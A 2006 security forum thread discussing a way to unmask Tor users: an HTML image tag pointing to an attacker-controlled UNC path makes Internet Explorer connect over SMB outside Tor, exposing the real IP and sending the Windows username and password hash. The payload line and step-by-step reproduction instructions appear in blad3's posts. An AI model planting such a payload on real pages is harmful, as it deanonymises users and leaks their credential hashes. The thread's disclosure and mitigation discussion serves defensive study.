Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Bypassing Tor
Posted by: blad3
Date: December 14, 2006 12:47PM

Tor is great and all, but if you put on some website:

<img src="\\my.ip.address\folder\img.jpg">

and navigate to that website using Internet Explorer, Windows will connect to my IP address to retrieve that image. Put a sniffer there and you managed to bypass Tor.

As a bonus besides revealing ones identity, Windows will also send your current username and password hash. Windows has this nice "feature" that it will try to use your current username and password when accessing a network share. Only if that fails, it will ask you for credentials.

Options: ReplyQuote
Re: Bypassing Tor
Posted by: rsnake
Date: December 14, 2006 05:50PM

Whoah... does that really work? That seems like a pretty nasty issue.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Bypassing Tor
Posted by: jungsonn
Date: December 14, 2006 11:24PM

Did you test this blad3 ?

If i understand correctly, the image is hosted on your local PC, so it tries to get the image on that website, through your router/firewall.

Then, it send the IP (and you can sniff it) or just using netstat?,
but that must be the IP from the Tor exit node i guess?

I wonder/doubt it will send the users real IP through Tor,
but if you can show an example i would be very, very, let's say inmensly happy! :))

Options: ReplyQuote
Re: Bypassing Tor
Posted by: blad3
Date: December 15, 2006 03:28AM

Yes, I have tested this. Based on my tests, it's working just fine.
Somebody else should try to reproduce these tests for confirmation.

jungsonn, yes. the image is hosted on my local PC.
When Internet Explorer will visit my webpage, it will try to request that image.
Because it cannot proxy this protocol, it will not send this request through proxy/tor.

It sends the IP by connecting to my computer to retrive that image file so it can display it. It's not the IP from the Tor exit node, the request will not pass through Tor (it's CIFS/NETBIOS/SMB protocol, not HTTP)

In order to show an example, I would need to build a sniffer and run it on my webserver and my hosting does not allow this.

If you want to test this out yourself, do the following:
Let's say you have 2 computers: honeypot and victim.

Create a webpage on honeypot (honeypot should be accessible from the internet) containing <img src="\\honeypot_ip\folder\image.jpg">
On honeypot start a sniffer.

On victim, start Tor and visit the webpage from honeypot through Tor.
In the sniffer, besides the usual HTTP traffic (from a Tor exit node) you should see some NETBIOS traffic (port 445) comming from the real IP address of victim.

Here is a screenshot of the traffic I'm receiving from Internet Explorer.
In my case 192.168.0.25 = honeypot and 192.168.0.26 = victim

http://www.blad3.ro/smb.png

Options: ReplyQuote
Re: Bypassing Tor
Posted by: jungsonn
Date: December 15, 2006 04:45AM

Wow that's nice!

But when i start to think about it, woudn't it be possible to just turn these protocol services of on windows? Still, that's why i rarely use MSIE & Windows. I do have it though, It sits on a box yeah, only as a flytrap :)

Did you try it through FF? or is this a NO-NO?

Options: ReplyQuote
Re: Bypassing Tor
Posted by: blad3
Date: December 15, 2006 05:12AM

I think you could turn these protocol services off.
Probably you need to disable Client for Microsoft Networks. Didn't tested.

It will not work on Firefox.
Only Internet Explorer supports this \\ip\folder format.

Options: ReplyQuote
Re: Bypassing Tor
Posted by: blad3
Date: December 15, 2006 10:45AM

BTW, there are a lot of ways to bypass Tor.

Andrew Christensen released two interesting papers on this subject.
http://www.fortconsult.net/images/pdf/tpr_100506.pdf
http://www.packetstormsecurity.org/0610-advisories/Practical_Onion_Hacking.pdf

I have tested the Flash and the Java methods (both of them working on Firefox).

Options: ReplyQuote
Re: Bypassing Tor
Posted by: jungsonn
Date: December 15, 2006 03:32PM

Blad3 i read the paper from fortconsult also a month ago after seraching for ways. But they state in their second paper (after it) that the java method no longer works, it returns only "localhost" which is sad, and good. I read further and it seems that it was a flaw in Java itself. It should be fixed by now and no longer working.

Options: ReplyQuote
Re: Bypassing Tor
Posted by: blad3
Date: December 15, 2006 10:22PM

Well, I can tell you for sure it still works.
I tried yesterday on Firefox 2.0 and Tor

Javascript tricks are not working.

Options: ReplyQuote
Re: Bypassing Tor
Posted by: jungsonn
Date: December 16, 2006 02:03AM

I guess you are right:
http://www.inet-police.com/cgi-bin/env.cgi

Strange, i read somwhere that is did not function anymore, so you see, don't beleive what you here until you see it yourself :)

Options: ReplyQuote


Sorry, only registered users may post in this forum.